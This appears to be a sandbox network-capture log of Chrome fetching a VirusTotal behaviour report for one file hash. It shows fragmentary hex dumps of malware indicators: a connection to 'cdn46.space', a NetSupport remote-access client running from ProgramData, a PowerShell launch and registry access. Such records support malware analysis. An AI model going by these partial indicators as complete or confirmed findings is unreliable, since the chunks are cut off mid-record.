                                                                                                                                                                                                                    2024-04-25 19:56:30 UTC1408INData Raw: 22 42 49 54 53 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 47 6f 6f 67 6c 65 43 68 72 6f 6d 65 45 6c 65 76 61 74 69 6f 6e 53 65 72 76 69 63 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 53 65 63 75 72 69 74 79 48 65 61 6c 74 68 53 65 72 76 69 63 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 72 76 69 63 65 73 5f 6f 70 65 6e 65 64 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 57 69 6e 44 65 66 65 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 61 73 5f 68 74 6d 6c 5f 72 65 70 6f 72 74 22 3a 20 74 72 75 65 2c 0a 20 20 20
                                                                                                                                                                                                                    Data Ascii: "BITS", "GoogleChromeElevationService", "SecurityHealthService" ], "services_opened": [ "WinDefend" ], "has_html_report": true,
                                                                                                                                                                                                                    2024-04-25 19:56:30 UTC545INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 54 4c 53 20 31 2e 32 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 6e 69 22 3a 20 22 63 64 6e 34 36 2e 73 70 61 63 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6a 61 33 22 3a 20 22 33 62 35 30 37 34 62 31 62 35 64 30 33 32 65 35 36 32 30 66 36 39 66 39 66 37 30 30 66 66 30 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6a 61 33 73 22 3a 20 22 62 36 35 33 63 32 35 31 62 30 65 65 35 34 63 33 30 38 38 66 65 37 62 62 39 39 37 63 66 35 39 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "version": "TLS 1.2", "sni": "cdn46.space", "ja3": "3b5074b1b5d032e5620f69f9f700ff0e", "ja3s": "b653c251b0ee54c3088fe7bb997cf59d" }
                                                                                                                                                                                                                    2024-04-25 19:56:30 UTC1408INData Raw: 32 5c 5c 57 69 6e 64 6f 77 73 50 6f 77 65 72 53 68 65 6c 6c 5c 5c 76 31 2e 30 5c 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 5c 22 20 2d 56 65 72 73 69 6f 6e 20 35 2e 31 20 2d 73 20 2d 4e 6f 4c 6f 67 6f 20 2d 4e 6f 50 72 6f 66 69 6c 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 5c 6e 65 74 73 75 70 70 6f 72 74 5c 5c 63 6c 69 65 6e 74 5c 5c 63 6c 69 65 6e 74 33 32 2e 65 78 65 5c 22 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 73 69 6e 67 6c 65 2d 61 72 67
                                                                                                                                                                                                                    Data Ascii: 2\\WindowsPowerShell\\v1.0\\powershell.exe\" -Version 5.1 -s -NoLogo -NoProfile", "\"C:\\ProgramData\\netsupport\\client\\client32.exe\"", "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --single-arg
                                                                                                                                                                                                                    2024-04-25 19:56:30 UTC1408INData Raw: 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 6e 6f 6e 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20 2d 2d 6d 6f 6a 6f 2d 70 6c 61 74 66 6f 72 6d 2d 63 68 61 6e 6e 65 6c 2d 68 61 6e 64 6c 65 3d 35 30 32 30 20 2d 2d 66 69 65 6c 64 2d 74 72 69 61 6c 2d 68 61 6e 64 6c 65 3d 31 39 32 30 2c 69 2c 38 32 34 39 31 33 34 39 39 36 32 33 34 32 35 35 30 35 39 2c 37 39 38 34 32 32 37 34 38 39 30 31 38 34 35 39 33 34 36 2c 32 36 32 31 34 34 20 2d 2d 76 61 72 69 61 74 69 6f 6e 73 2d 73 65 65 64 2d 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 34 30 39 2d 31 38 30 30 34 36 2e 31 38 33 30 30 30 20 2f 70 72 65 66 65 74 63 68 3a 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72
                                                                                                                                                                                                                    Data Ascii: --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5020 --field-trial-handle=1920,i,8249134996234255059,7984227489018459346,262144 --variations-seed-version=20240409-180046.183000 /prefetch:8", "\"C:\\Progr
                                                                                                                                                                                                                    2024-04-25 19:56:30 UTC1280INData Raw: 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 74 79 70 65 3d 75 74 69 6c 69 74 79 20 2d 2d 75 74 69 6c 69 74 79 2d 73 75 62 2d 74 79 70 65 3d 71 75 61 72 61 6e 74 69 6e 65 2e 6d 6f 6a 6f 6d 2e 51 75 61 72 61 6e 74 69 6e 65 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 6e 6f 6e 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20 2d 2d 6d 6f 6a 6f 2d 70 6c 61 74 66 6f 72 6d 2d 63 68 61 6e 6e 65 6c 2d 68 61 6e 64 6c 65 3d 35 33 30 34 20 2d 2d 66 69 65 6c 64 2d 74 72 69 61 6c 2d 68 61 6e 64 6c 65 3d 31 39 32 30 2c 69 2c 38 32 34 39 31 33 34 39 39 36 32 33 34 32 35 35 30 35 39 2c 37 39
                                                                                                                                                                                                                    Data Ascii: s\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5304 --field-trial-handle=1920,i,8249134996234255059,79
                                                                                                                                                                                                                    2024-04-25 19:56:30 UTC1408INData Raw: 65 64 64 69 6e 67 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 79 73 74 65 6d 33 32 5c 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 6e 65 74 73 76 63 73 20 2d 70 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 31 32 32 2e 30 2e 36 32 36 31 2e 31 31 32 5c 5c 65 6c 65 76 61 74 69 6f 6e 5f 73 65 72 76 69 63 65 2e 65 78 65 5c 22 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 79 73 74 65 6d 33 32 5c 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 4c 6f
                                                                                                                                                                                                                    Data Ascii: edding", "C:\\Windows\\System32\\svchost.exe -k netsvcs -p", "\"C:\\Program Files\\Google\\Chrome\\Application\\122.0.6261.112\\elevation_service.exe\"", "C:\\Windows\\System32\\svchost.exe -k Lo
                                                                                                                                                                                                                    2024-04-25 19:56:30 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 74 65 6d 33 32 5c 5c 77 62 65 6d 5c 5c 77 6d 69 70 72 76 73 65 2e 65 78 65 20 2d 73 65 63 75 72 65 64 20 2d 45 6d 62 65 64 64 69 6e 67 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 79 73 74 65 6d 41 70 70 73 5c 5c 4d 69 63 72 6f 73 6f 66 74 57 69 6e 64 6f 77 73 2e 43 6c 69 65 6e 74 2e 43 42 53 5f 63 77 35 6e 31 68 32 74 78 79 65 77 79 5c 5c 49 6e 70 75 74 41 70 70 5c 5c 54 65 78 74 49 6e 70 75 74 48 6f 73 74 2e 65 78 65 5c 22 20 2d 53 65 72 76 65 72 4e 61 6d 65 3a 49 6e 70 75 74 41 70 70 2e 41 70 70 58 39 6a 6e 77 79 6b 67 72 63 63 78 63 38 62 79 33 68 73 72 73 68 30 37 72 34 32 33 78 7a 76
                                                                                                                                                                                                                    Data Ascii: "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "\"C:\\Windows\\SystemApps\\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\\InputApp\\TextInputHost.exe\" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzv
                                                                                                                                                                                                                    2024-04-25 19:56:30 UTC1280INData Raw: 62 61 73 65 3d 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 55 73 65 72 20 44 61 74 61 5c 5c 43 72 61 73 68 70 61 64 5c 22 20 2d 2d 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 63 6c 69 65 6e 74 73 32 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 72 2f 72 65 70 6f 72 74 20 2d 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 63 68 61 6e 6e 65 6c 3d 20 2d 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 70 6c 61 74 3d 57 69 6e 36 34 20 2d 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 70 72 6f 64 3d 43 68 72 6f 6d 65 20 2d 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 76 65 72 3d 31 32 32 2e 30 2e 36 32 36 31 2e 31 31 32 20 2d 2d 69 6e 69 74 69 61 6c 2d 63 6c 69 65 6e 74 2d 64 61 74 61 3d 30 78 32 30 30 2c 30 78
                                                                                                                                                                                                                    Data Ascii: base=C:\\Users\\<USER>\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=122.0.6261.112 --initial-client-data=0x200,0x
                                                                                                                                                                                                                    2024-04-25 19:56:30 UTC1408INData Raw: 6c 69 74 79 2d 73 75 62 2d 74 79 70 65 3d 73 74 6f 72 61 67 65 2e 6d 6f 6a 6f 6d 2e 53 74 6f 72 61 67 65 53 65 72 76 69 63 65 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 73 65 72 76 69 63 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20 2d 2d 6d 6f 6a 6f 2d 70 6c 61 74 66 6f 72 6d 2d 63 68 61 6e 6e 65 6c 2d 68 61 6e 64 6c 65 3d 32 32 38 34 20 2d 2d 66 69 65 6c 64 2d 74 72 69 61 6c 2d 68 61 6e 64 6c 65 3d 31 39 32 30 2c 69 2c 38 32 34 39 31 33 34 39 39 36 32 33 34 32 35 35 30 35 39 2c 37 39 38 34 32 32 37 34 38 39 30 31 38 34 35 39 33 34 36 2c 32 36 32 31 34 34 20 2d 2d 76 61 72 69 61 74 69 6f 6e 73 2d 73 65 65 64 2d 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 34 30 39 2d 31
                                                                                                                                                                                                                    Data Ascii: lity-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2284 --field-trial-handle=1920,i,8249134996234255059,7984227489018459346,262144 --variations-seed-version=20240409-1


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    251192.168.2.165001174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:30 UTC562OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:31 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: d5e115c0ff2be2957ac53eabe690928c
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:31 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:31 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    252192.168.2.165001274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:34 UTC955OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTU2NzkxNDA1NjUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTkzLjQ0Ng==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:35 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: f9385f4d215cbc66ff4c5af1ddbb2a49
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:35 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 159972
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:56:35 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:35 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 5f 43 41 50 45 20 53 61 6e 64 62 6f 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox", "type": "file_behaviour", "links": { "self": "https://www.virustotal.com/ui/file_behaviour
                                                                                                                                                                                                                    2024-04-25 19:56:35 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 73 73 75 65 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 4e 22 3a 20 22 52 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 22 3a 20 22 55 53 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 72 69 61 6c 5f 6e 75 6d 62 65 72 22 3a 20 22 30 33 37 35 63 62 65 65 66 66 39 37 36 63 62 31 30 32 64 63 63 61 39 34 30 63 39 61 31 66 32 66 36 62 34 63 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: }, "issuer": { "CN": "R3", "C": "US" }, "serial_number": "0375cbeeff976cb102dcca940c9a1f2f6b4c",
                                                                                                                                                                                                                    2024-04-25 19:56:35 UTC544INData Raw: 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 53 74 72 65 61 6d 52 65 73 6f 75 72 63 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 4e 6f 53 65 74 46 6f 6c 64 65 72 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d
                                                                                                                                                                                                                    Data Ascii: rer\\FolderDescriptions\\{AE50C081-EBD2-438A-8655-8A092E34987A}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetFolders", "HKEY_CURRENT_USER\\SOFTWARE\\M
                                                                                                                                                                                                                    2024-04-25 19:56:35 UTC1408INData Raw: 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 49 6e 66 6f 54 69 70 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 6f 66 74 77 61 72 65 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 43 4c 53 49 44 5c 5c 7b 35 39 30 33 31 41 34 37 2d 33 46 37 32 2d 34 34 41 37 2d 38 39 43 35 2d 35 35 39 35 46 45 36 42 33 30 45 45 7d 5c 5c 53 68 65 6c 6c 46 6f 6c 64 65 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: n\\Explorer\\FolderDescriptions\\{AE50C081-EBD2-438A-8655-8A092E34987A}\\InfoTip", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\ShellFolder",
                                                                                                                                                                                                                    2024-04-25 19:56:35 UTC1408INData Raw: 79 5c 5c 53 54 45 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 44 65 66 69 6e 69 74 69 6f 6e 46 6c 61 67 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43 48 49 4e 45 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 43 6c 61 73 73 65 73 5c 5c 43 4c 53 49 44 5c 5c 7b 44 46 46
                                                                                                                                                                                                                    Data Ascii: y\\STE", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{AE50C081-EBD2-438A-8655-8A092E34987A}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{DFF
                                                                                                                                                                                                                    2024-04-25 19:56:35 UTC1280INData Raw: 46 6f 6c 64 65 72 44 65 73 63 72 69 70 74 69 6f 6e 73 5c 5c 7b 41 45 35 30 43 30 38 31 2d 45 42 44 32 2d 34 33 38 41 2d 38 36 35 35 2d 38 41 30 39 32 45 33 34 39 38 37 41 7d 5c 5c 50 61 72 73 69 6e 67 4e 61 6d 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 43 55 52 52 45 4e 54 5f 55 53 45 52 5c 5c 53 4f 46 54 57 41 52 45 5c 5c 4d 69 63 72 6f 73 6f 66 74 5c 5c 57 69 6e 64 6f 77 73 5c 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 5c 50 6f 6c 69 63 69 65 73 5c 5c 45 78 70 6c 6f 72 65 72 5c 5c 50 72 65 76 65 6e 74 49 74 65 6d 43 72 65 61 74 69 6f 6e 49 6e 55 73 65 72 73 46 69 6c 65 73 46 6f 6c 64 65 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 48 4b 45 59 5f 4c 4f 43 41 4c 5f 4d 41 43
                                                                                                                                                                                                                    Data Ascii: FolderDescriptions\\{AE50C081-EBD2-438A-8655-8A092E34987A}\\ParsingName", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\PreventItemCreationInUsersFilesFolder", "HKEY_LOCAL_MAC
